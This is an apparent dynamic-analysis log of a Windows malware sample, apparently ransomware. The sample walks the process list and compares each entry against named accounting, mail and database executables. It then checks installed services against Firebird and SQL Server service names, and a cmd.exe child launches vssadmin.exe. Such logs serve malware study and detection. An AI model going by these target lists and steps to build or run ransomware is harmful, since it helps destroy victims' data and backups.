	[0058.497] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0058.498] lstrlenW (lpString="System") returned 6
	[0058.498] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0058.498] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0058.498] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0058.498] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0058.498] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0058.498] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0058.498] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0058.498] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0058.498] lstrlenW (lpString="smss.exe") returned 8
	[0058.498] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0058.498] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0058.498] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0058.498] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0058.498] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0058.498] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0058.498] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0058.498] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0058.499] lstrlenW (lpString="csrss.exe") returned 9
	[0058.499] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0058.499] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0058.499] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0058.499] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0058.499] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0058.499] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0058.499] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0058.499] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0058.500] lstrlenW (lpString="wininit.exe") returned 11
	[0058.500] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0058.500] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0058.500] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0058.500] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0058.500] lstrlenW (lpString="csrss.exe") returned 9
	[0058.500] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0058.501] lstrlenW (lpString="winlogon.exe") returned 12
	[0058.501] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0058.501] lstrlenW (lpString="services.exe") returned 12
	[0058.501] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0058.502] lstrlenW (lpString="lsass.exe") returned 9
	[0058.502] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0058.502] lstrlenW (lpString="lsm.exe") returned 7
	[0058.502] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0058.503] lstrlenW (lpString="svchost.exe") returned 11
	[0058.503] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0058.503] lstrlenW (lpString="svchost.exe") returned 11
	[0058.503] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0058.504] lstrlenW (lpString="svchost.exe") returned 11
	[0058.504] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0058.504] lstrlenW (lpString="svchost.exe") returned 11
	[0058.504] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0058.504] lstrlenW (lpString="svchost.exe") returned 11
	[0058.504] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0058.505] lstrlenW (lpString="audiodg.exe") returned 11
	[0058.505] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0058.505] lstrlenW (lpString="svchost.exe") returned 11
	[0058.505] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0058.506] lstrlenW (lpString="svchost.exe") returned 11
	[0058.506] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0058.506] lstrlenW (lpString="dwm.exe") returned 7
	[0058.507] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0058.507] lstrlenW (lpString="explorer.exe") returned 12
	[0058.507] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0058.507] lstrlenW (lpString="spoolsv.exe") returned 11
	[0058.507] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0058.508] lstrlenW (lpString="taskhost.exe") returned 12
	[0058.508] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0058.508] lstrlenW (lpString="svchost.exe") returned 11
	[0058.508] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0058.509] lstrlenW (lpString="taskeng.exe") returned 11
	[0058.509] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0058.509] lstrlenW (lpString="taskhost.exe") returned 12
	[0058.509] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0058.510] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0058.510] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0058.510] lstrlenW (lpString="python tragedy.exe") returned 18
	[0058.510] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0058.511] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0058.511] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0058.511] lstrlenW (lpString="computers.exe") returned 13
	[0058.511] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0058.512] lstrlenW (lpString="separated.exe") returned 13
	[0058.512] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0058.512] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0058.512] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0058.513] lstrlenW (lpString="darkness.exe") returned 12
	[0058.513] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0058.513] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0058.513] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0058.514] lstrlenW (lpString="sophisticated.exe") returned 17
	[0058.514] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0058.514] lstrlenW (lpString="wishlist.exe") returned 12
	[0058.514] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0058.515] lstrlenW (lpString="top.exe") returned 7
	[0058.515] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0058.515] lstrlenW (lpString="implemented.exe") returned 15
	[0058.515] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0058.515] lstrlenW (lpString="comp.exe") returned 8
	[0058.516] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0058.516] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0058.516] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0058.517] lstrlenW (lpString="solved.exe") returned 10
	[0058.517] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0058.517] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0058.517] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0058.518] lstrlenW (lpString="trips.exe") returned 9
	[0058.518] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0058.518] lstrlenW (lpString="tumormanual.exe") returned 15
	[0058.518] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0058.519] lstrlenW (lpString="telecom.exe") returned 11
	[0058.519] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0058.519] lstrlenW (lpString="realistic.exe") returned 13
	[0058.519] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0058.519] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0058.520] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0058.520] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0058.520] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0058.520] lstrlenW (lpString="cmd.exe") returned 7
	[0058.520] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0058.803] lstrlenW (lpString="conhost.exe") returned 11
	[0058.806] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0058.816] lstrlenW (lpString="vssadmin.exe") returned 12
	[0058.823] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0058.832] lstrlenW (lpString="VSSVC.exe") returned 9
	[0058.832] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0058.832] lstrlenW (lpString="svchost.exe") returned 11
	[0058.832] Process32NextW (in: hSnapshot=0x158, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0058.833] CloseHandle (hObject=0x158) returned 1
	[0058.833] Sleep (dwMilliseconds=0x1f4) 
	[0060.134] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7df2fe0
	[0060.134] EnumServicesStatusExW (in: hSCManager=0x7df2fe0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0060.134] GetLastError () returned 0xea
	[0060.134] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xb4b70c0
	[0060.135] EnumServicesStatusExW (in: hSCManager=0x7df2fe0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb4b70c0, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb4b70c0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0060.135] CloseServiceHandle (hSCObject=0x7df2fe0) returned 1
	[0060.135] lstrlenW (lpString="Appinfo") returned 7
	[0060.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0060.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0060.135] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0060.135] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0060.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0060.136] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0060.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0060.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0060.136] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0060.136] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0060.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0060.136] lstrlenW (lpString="AudioSrv") returned 8
	[0060.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0060.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0060.136] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0060.136] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0060.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0060.136] lstrlenW (lpString="BFE") returned 3
	[0060.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0060.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0060.136] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0060.136] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0060.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0060.136] lstrlenW (lpString="CryptSvc") returned 8
	[0060.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0060.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0060.136] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0060.136] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0060.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0060.136] lstrlenW (lpString="CscService") returned 10
	[0060.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0060.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0060.136] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0060.136] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0060.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0060.136] lstrlenW (lpString="DcomLaunch") returned 10
	[0060.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0060.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0060.136] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0060.136] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0060.137] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0060.137] lstrlenW (lpString="Dhcp") returned 4
	[0060.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0060.137] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0060.137] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0060.137] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0060.137] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0060.137] lstrlenW (lpString="Dnscache") returned 8
	[0060.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0060.137] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0060.137] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
